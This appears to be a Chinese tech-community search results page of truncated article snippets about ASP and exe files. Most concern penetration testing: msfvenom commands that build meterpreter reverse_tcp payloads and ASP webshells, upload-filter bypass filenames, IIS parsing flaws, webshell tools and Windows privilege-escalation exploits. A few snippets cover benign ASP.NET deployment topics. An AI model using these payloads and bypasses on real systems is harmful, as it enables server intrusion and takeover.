展开

关键词

Win7本地溢出exploit提权-CVE-2018-8120

番外篇二进制文件后缀可任意修改首先我们是有一个二进制文件:CVE-2018-8120.exe?接着吧exe后缀改成txt? 一般这种用于不能上传exe、bat文件,我们就可以吧exe文件修改为可上传的后缀文件也能照常运行!?图片格式也是可以的! aspx比asp权限大如果网站支持aspx脚本,那么有的时候asp的权限比较小,但是上传了aspx脚本后权限就比asp要大一些!因为aspx使用的是.net技术。 IIS 中默认不支持,ASPX需要依赖于.net framework …ASP只是脚本语言而已。ASP.NET允许用户使用IIS建立网络服务。 入侵的时候…asp的木马一般是guest权限…APSX的木马一般是users权限…iis6默认以network service身份运行。

54720

Msfvenom参考总结

(- -help-formats 列出所有文件格式)Executable formats:asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only , exe-service, exe-small, hta-psh, jar, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection , psh-cmd, vba, vba-exe, vba-psh, vbs, warTransform formats:bash, c, csharp, dw, dword, hex, java, js_be 普通生成msfvenom -p -f -o msfvenom –p windowsmeterpreterreverse_tcp –f exe –o C:back.exe13. Aspmsfvenom -p windowsmeterpreterreverse_tcp LHOST= LPORT= -f asp > shell.asp20.

26530
  • 广告
    关闭

    50+款云产品免费体验

    提供包括云服务器,云数据库在内的50+款云计算产品。打造一站式的云产品试用服务,助力开发者和企业零门槛上云。

  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    上传伪技术~很多人都以为判断了后缀,判断了ContentType,判断了头文件就真的安全了。是吗?

    ,比如你把 aa文件夹设置了权限,一些类似于exeasp,php之类的文件不能执行,那么如果我在传路径的时候,前面加了一个..呢,这样这种服务器端的限制就跳过了。 (DJ音乐站基本上都有这个问题,以及用某编辑器的同志)1.常用方法:这种就是根据后缀判断是否是图片文件,需要注意的是这种格式:文件:1.asp;.jpg 1.asp%01.jpg 目录: 1.jpg1. asp 1.jpg1.php 等等,IIS和Nginx部分版本是有解析漏洞的(不要用文件原有名称,eg:1.asp.jpg=》去后缀后的名字就是1.asp) 图片上传 public JsonResult 呃,也许吧,上面至少还有个文件后缀硬性判断,contentType这玩意抓个包,本地代理一开,直接就可以串改,传的是1.asp,你收的contextType依旧是图片格式,最后保存就玩完了) 图片上传 呃,也许吧,不过如果你是4.5以及以后也许就可以这样理解了~~先贴代码:*头文件参考:(我自己测是如有偏差请联系我)7790:exe,dll5666:psd6677:bmp7173:gif13780:png255216

    58580

    常见中间件漏洞(续)

    将上传的webshell.txt修改成后缀为asp的文件。在数据包格式里选择“MOVE”,然后点击“提交数据包”。 ?站点下已经存在shell.asp ? 上传3389.bat,利用iis6.exe运行 ?可以看到远程桌面已经打开,连接即可 ? IIS 解析漏洞漏洞原理:1.目录解析 xxx.aspxxx.jpg即在网站建立文件夹为.asp、.asa的文件夹,该文件夹内的任何拓展名文件都被IIS6.0当成asp文件来解析并执行。 利用:上传路径控制2.文件解析*.asp;.jpg即分号后面的内容不被解析,服务器将*.asp;.jpg当成*.asp除此之外还有*.asa、*.cer、*.cdx**漏洞条件:**结合文件上传即可

    19420

    dotnet-warp && NSSM 部署 .net core 项目到 windows 服务

    github.comHubert-Rybakdotnet-warp 安装:dotnet tool install --global dotnet-warp 使用:在项目输出目录执行 dotnet-warp 即可将应用打包成一个exe NSSM 安装使用 NSSM 是一个服务封装程序,它可以方便的将 Exe 程序封装成 windows 服务运行 下载:nssm-2.24 使用:下载后将对应版本拷贝到目标机器,然后命令行执行:nssm 简单的给 asp .net core项目传入监听端口public static IWebHostBuilder CreateWebHostBuilder(string)) { urls.AddRange

    42930

    Install Office Onlin

    48145Start-BitsTransfer –Source  http:download.microsoft.comdownload93F93FCF1E7-E6A4-478B-96E7-D4B285925B00vc_redist.x64.exe   -Destination c:vc_redist.x64.exe运行安装:c:vc_redist.x64.exe q??? Web-Stat-Compression,Web-Dyn-Compression,Web-Security,Web-Filtering,Web-Windows-Auth,Web-App-Dev,Web-Net-Ext45,Web-Asp-Net45

    27820

    文件上传Bypass安全狗

    ,如阿里云CDN,百度云CDN等等;硬WAF,如天融信,安恒等等,无论是软WAF、云WAF还是硬WAF,总体上绕过的思路都是让WAF无法获取到文件名或者其他方式无法判断我们上传的木马(PHP、JSP、ASP 请求的urlBoundary边界MIME类型文件扩展名文件内容常见扩展名黑名单:asp|asa|cer|cdx|aspx|ashx|ascx|asaxphp|php2|php3|php4|php5|asis |htaccesshtm|html|shtml|pwml|phtml|phtm|js|jspvbs|asis|sh|reg|cgi|exe|dll|com|bat|pl|cfc|cfm|ini测试时的准备工作

    18120

    文件上传漏洞超级大汇总-最终篇

    Fck2.2编辑器的file目录上传限制如下:ConfigAllowedExtensions.Add File, ConfigDeniedExtensions.Add File, php|asp|aspx |ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg2. 上传一个cq.asp文件,发现弹出窗口禁止asp上传。如下图所示:?1. 将cq.asp改名为cq.asa,再次上传,如下图所示:?1. 访问改cq.asa文件,可以正常解析出来,如下图:?1. 上传攻击结束例如还有.asp空格、.asp..php空格 、.php3、.php. 绕过黑名单限制。总结 哇!!!!!

    1.4K80

    渗透测试常见术语

    肉机:被植入木马的电脑或者是服务器等联网设备软件木马:远控软件的被控端(exe文件)脚本木马:脚本语言编写的被控端(asp、php…)拿Webshell(有人也会说是:拿shell):拿到网站的最高权限服务器

    70910

    win2003 AspJpeg安装图文教程

    现在服务器如果想让asp支持图片处理,比较常用的工具,安装方法,大家可以参考下。 下载后解压到任意目录,执行AspJpeg1.9.exe,执行安装;安装常见组件之ASPJPEG安装图解。

    23800

    异常:System.BadImageFormatException,未能加载正确的程序集XXX或其某一依赖项

    EXE程序就是它自己,而网站就是IIS的宿主进程(w3wp.exe,在XP中是aspnet_wp.exe)。 64位Windows7中IIS7启用32位应用程序64位Windows7中IIS7运行ASP时出现ADODB.Connection错误“800a0e7a”的解决方法操作步骤:  01、打开“Internet

    2.7K20

    开源Webshell利用工具——Altman

    截止目前,已经包含三个插件——命令执行、文件管理和数据库管理;脚本类型已经支持php,asp和aspx。以下是程序的一些截图。????? 首先说对脚本类型的支持,虽然目前只支持php,asp和aspx这3个类型,但是理论上所有的脚本语言都可以支持,只需要你为程序添加几个脚本类型文件。 程序Exe下载地址:http:www.keepwn.comtoolsAltman2.0.8.zip源码地址:https:github.comkeepwnAltman.git欢迎大家提出各种改进意见哈:)

    1.1K100

    ASP.NET Core Web程序托管到Windows 服务

    将WEB应用作为服务运行我们需要将我们的WEB应用程序编译成exe文件,在ASP.NETCore中其实这是一个很简单的过程,我们只需要修改.csproj即可。 正如下面代码片段 netcoreapp3.1 Exe 我们只需要添加OutputType即可.接着来我们需要安装Microsoft.Extensions.Hosting.WindowsServices到我们的 部署服务我们还需要做的是部署到我们的服务中.以管理员身份打开命令提示符,然后在项目文件夹中运行以下命令以发布项目:dotnet publish -c Release接下来,我们可以使用标准Windows服务命令将exe github.comhueifengBlogSampletreemastersrcASPNETCoreWindowsServicehttps:dotnetcoretutorials.com20191221hosting-an-asp-net-core-web-app-as-a-windows-service-in-net-core

    40531

    ASP.NET Core Web程序托管到Windows 服务

    将WEB应用作为服务运行 我们需要将我们的WEB应用程序编译成exe文件,在ASP.NETCore中其实这是一个很简单的过程,我们只需要修改.csproj即可。 正如下面代码片段 netcoreapp3.1 Exe 我们只需要添加OutputType即可. 以管理员身份打开命令提示符,然后在项目文件夹中运行以下命令以发布项目: dotnet publish -c Release 接下来,我们可以使用标准Windows服务命令将exe作为服务安装。 github.comhueifengBlogSampletreemastersrcASPNETCoreWindowsService https:dotnetcoretutorials.com20191221hosting-an-asp-net-core-web-app-as-a-windows-service-in-net-core

    45000

    bind_tcp正向连接在实战中的应用

    这个站点使用Asp + Access,一个很普通的SQL注入漏洞,这里就不详细写了。 这个站点使用Asp + Access,一个很普通的SQL注入漏洞,这里就不详细写了。 英国)环境平台:ASP.NET服务器系统:Microsoft-IIS6.0端口开放:21、80、135、443、445、554、3389补丁情况:服务器系统打了450+补丁(32位系统)脚本探测:支持ASP 解决办法:利用MSF工具里的bind_tcp正向连接生成一个EXE攻击载荷, 得到目标会话后在Meterpreter中使用portfwd命令进行端口转发即可。 通过Nmap扫描状态为closed的端口有:25、53、110、113、7070,接下来我们使用bind_tcp正向连接来生成一个EXE攻击载荷文件,命令如下。

    60520

    reverse_tcp反向连接在实战中的应用

    0x01 前言Datetime:2013年,闲着没事随便找了个英国小站练手,通过对目标网站的观察得到个敏感目录userfilefile,Fckeditor默认上传路径,Fckeditor 2.4.3 ASP 3(英国) 环境平台:ASP.NET服务器系统:Microsoft-IIS7.5端口开放:21、80、135、445、3389、14147补丁情况:服务器系统打了60+补丁(64位系统)脚本探测:支持ASP 解决办法:利用Metasploit工具里的reverse_tcp反向连接生成一个EXE攻击载荷文件,然后在Meterpreter会话中用portfwd命令进行端口转发即可。 (2) 实战应用如果我们自己也处于内网环境的情况下,那么就需要先在路由器里进行端口映射配置,然后再用reverse_tcp反向连接来生成一个EXE攻击载荷文件,命令如下。

    34820

    看我如何快速拿下整个C段主机权限

    通过这个注入点成功得到网站管理员帐号和密码,登录网站后台并找到一处无任何过滤的上传,直接传了一个ASP的图片马,就这样很顺利的拿到这个站的Webshell权限。? 0x03 实战提权过程服务器基本信息探测:端口开放:21、80、135、443、445、873、65432补丁情况:打了750+系统补丁(Windows 2003 x86)脚本探测:仅支持ASP脚本文件 pr.exe,Churrasco.exe,2003.exe,NDProxy.exe,iis6.exe,MS11-046.exe,MS10-048.exe,MS11-080.exe,MS13-051.exe

    15120

    冗余代码检查工具Simian

    进入正题,介绍一下Simian这个冗余代码检查工具,目前的版本是2.2.24,不光是c#代码,它也可以用来检查C, C++, COBOL, Ruby, JSP, ASP, HTML, XML, Visual 使用方法:    到官方站点上下载最新的版本,下载完毕后,将文件解压,将simian所在的路径添加到windows环境变量path下,同时,将simian-2.2.24.exe的文件名改成simian.exe

    90780

    某HW行动中的一次渗透测试

    尝试上传asp文件,成功解析:?附:web.config实战用法(https:www.jianshu.compca7ea37bb1c1)接着上传asp webshell,用蚁剑连接:? 将生成的exe利用蚁剑上传到服务器并执行,成功反弹shell。?接下来进行提权,systeminfo看下补丁。?可以利用https:bugs.hacking8.comtiquan进行补丁的对比?

    43210

    Web渗透之文件上传漏洞总结

    blacklist(黑名单列表)的漏网之鱼,例如大小写:如果检测的时候不忽略大小写,那么可以改变后缀名的大小写绕过扩展名:列表中如果忽略了某些后缀 能被解析的文件扩展名列表: jsp jspx jspf asp asa cer aspx php php php3 php4 pht exe exee 后缀白名单检测:白名单检测还是会比黑名单强一点,常见的绕过方法有%00截断,还有服务器的解析漏洞 %00截断漏洞 和其他漏洞结合的上传服务器解析漏洞IS5.x-6.x解析漏洞使用iis5.x-6.x版本的服务器,大多为windows server 2003,网站比较古老,开发语句一般为asp;该解析漏洞也只能解析asp 目录解析(6.0)形式:www.xxx.comxx.aspxx.jpg 原理: 服务器默认会把.asp,.asp目录下的文件都解析成asp文件。 文件解析形式:www.xxx.comxx.asp;.jpg 原理:服务器默认不解析;号后面的内容,因此xx.asp;.jpg便被解析成asp文件了。

    82920

    相关产品

    • 云服务器

      云服务器

      腾讯云服务器(CVM)为您提供安全可靠的弹性云计算服务。只需几分钟,您就可以在云端获取和启用云服务器,并实时扩展或缩减云计算资源。云服务器 支持按实际使用的资源计费,可以为您节约计算成本。

    相关资讯

    热门标签

    活动推荐

      运营活动

      活动名称
      广告关闭

      扫码关注云+社区

      领取腾讯云代金券